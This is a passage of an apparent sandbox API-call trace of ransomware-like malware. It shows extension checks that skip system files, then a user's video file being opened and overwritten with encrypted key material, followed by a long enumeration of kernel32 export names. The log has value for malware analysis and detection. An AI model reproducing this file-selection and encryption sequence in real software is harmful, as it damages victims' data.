(lpString1="xMpLxLM2esbvdeLtC.mp4", lpString2="Bootfont.bin") returned 1 [0087.861] lstrlenW (lpString="xMpLxLM2esbvdeLtC.mp4") returned 21 [0087.861] lstrcmpiW (lpString1="mp4", lpString2="lnk") returned 1 [0087.861] lstrcmpiW (lpString1="mp4", lpString2="exe") returned 1 [0087.861] lstrcmpiW (lpString1="mp4", lpString2="sys") returned -1 [0087.861] lstrcmpiW (lpString1="mp4", lpString2="dll") returned 1 [0087.861] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.861] lstrlenW (lpString="xMpLxLM2esbvdeLtC.mp4") returned 21 [0087.861] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.861] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="xMpLxLM2esbvdeLtC.mp4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xMpLxLM2esbvdeLtC.mp4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xMpLxLM2esbvdeLtC.mp4" [0087.861] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xMpLxLM2esbvdeLtC.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xmplxlm2esbvdeltc.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.861] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=101978) returned 1 [0087.861] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.861] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.862] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.862] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.862] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.862] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.862] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0087.864] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.864] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.865] CloseHandle (hObject=0x414) returned 1 [0087.865] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.865] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.866] CloseHandle (hObject=0x0) returned 0 [0087.866] CloseHandle (hObject=0x410) returned 1 [0087.866] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.866] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.866] GetTickCount () returned 0x114e688 [0087.866] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.867] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.867] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.867] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.867] lstrlenA (lpString="kernel32.dll") returned 12 [0087.867] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.867] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.867] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.868] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.868] lstrlenA (lpString="ADDATOMA") returned 8 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.868] lstrlenA (lpString="ADDATOMW") returned 8 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.868] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.868] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.868] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.868] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.868] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.868] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.868] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.868] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.868] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.868] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.868] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.868] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.868] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.868] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.868] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.868] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.869] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.869] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.869] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.869] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.869] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.869] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.869] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.869] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.869] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.869] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.869] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.869] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.869] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.869] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.869] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.869] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.869] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.869] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.870] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.870] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.870] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.870] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.870] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.870] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.870] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.870] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.870] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.870] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.870] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.870] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.870] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.870] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.870] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.870] lstrlenA (lpString="BEEP") returned 4 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.870] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.870] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.870] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.871] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.871] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.871] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.871] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.871] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.871] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.871] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.871] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.871] lstrlenA (lpString="CANCELIO") returned 8 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.871] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.871] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.871] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.871] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.871] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.871] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.871] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.871] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.871] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.872] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.872] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.872] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.872] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.872] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.872] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.872] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.872] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.872] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.872] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.872] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.872] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.872] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.872] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.872] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.872] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.872] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.872] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.872] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.872] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.873] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.873] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.873] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.873] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.873] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.873] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.873] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.873] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: 